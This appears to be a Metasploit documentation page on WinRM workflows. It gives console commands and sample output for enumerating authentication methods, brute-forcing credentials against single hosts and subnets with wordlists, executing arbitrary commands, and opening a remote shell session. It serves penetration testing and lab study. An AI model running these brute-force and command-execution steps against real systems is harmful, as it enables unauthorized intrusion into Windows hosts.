Link Search Menu Expand Document

WinRM Workflows

Windows Remote Management (WinRM), is a way for clients to remotely manage Windows computers. WinRM is built on top of the Simple Object Access Protocol (SOAP) over HTTP(S).

There are two main ports for WinRM:

  • 5985/TCP - HTTP
  • 5986/TCP - HTTPS

Important: Before running the chosen WinRM Metasploit module, first ensure that the RPORT and SSL values are configured correctly. Either with the modern inline option support:

use scanner/winrm/winrm_auth_methods

run http://192.168.123.139:5985
run https://192.168.123.139:5986

Or by manually setting options:

use scanner/winrm/winrm_auth_methods
set RHOST 192.168.123.139
set RPORT 5985
set SSL false
run

Metasploit has support for multiple WinRM modules, including:

  • Authentication enumeration
  • Verifying/bruteforcing credentials
  • Running commands and opening sessions

There are more modules than listed here, for the full list of modules run the search command within msfconsole:

msf6 > search winrm

Lab Environment

The WinRM modules work against Windows instances which have WinRM installed and configured.

For a domain controller the Allow remote server management through WinRM policy will need be enabled. It is only possible to use WinRM against accounts which are part of the Remote Management Users group.

WinRM over HTTPS requires the creation of a Server Authenticating Certificate, as well as enabling the transport mode:

winrm quickconfig -transport:https

Authentication Enumeration

Enumerate WinRm authentication mechanisms:

use scanner/winrm/winrm_auth_methods
run http://192.168.123.139:5985
run https://192.168.123.139:5986

Example:

msf6 auxiliary(scanner/winrm/winrm_auth_methods) > run http://192.168.123.139:5985

[+] 192.168.123.139:5985: Negotiate protocol supported
[+] 192.168.123.139:5985: Kerberos protocol supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

WinRM Bruteforce

Brute-force host with known user and password list:

use scanner/winrm/winrm_login
run https://known_user@192.168.222.1:5986 threads=50 pass_file=./wordlist.txt

Brute-force credentials:

use scanner/winrm/winrm_login
run http://192.168.123.139:5985 threads=50 user_file=./users.txt pass_file=./wordlist.txt

Brute-force credentials in a subnet:

use scanner/winrm/winrm_login
run cidr:/24:http://user:pass@192.168.222.0:5985 threads=50
run cidr:/24:http://user@192.168.222.0:5985 threads=50 pass_file=./wordlist.txt

WinRM CMD

To execute arbitrary commands against a windows target:

use scanner/winrm/winrm_cmd
run http://user:pass@192.168.123.139:5985 cmd='whoami; ipconfig; systeminfo'

WinRM Login Session

If you have valid credentials the scanner/winrm/winrm_login module will open a Metasploit session for you:

use scanner/winrm/winrm_login
run http://user:pass@192.168.123.139:5985

Example:

msf6 auxiliary(scanner/winrm/winrm_login) > run http://user:pass@192.168.123.139:5985

[!] No active DB -- Credential data will not be saved!
[+] 192.168.123.139:5985 - Login Successful: WORKSTATION\user:pass
[*] Command shell session 7 opened (192.168.123.1:58673 -> 192.168.123.139:5985 ) at 2022-04-23 02:36:34 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1
[*] Starting interaction with 7...

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\user>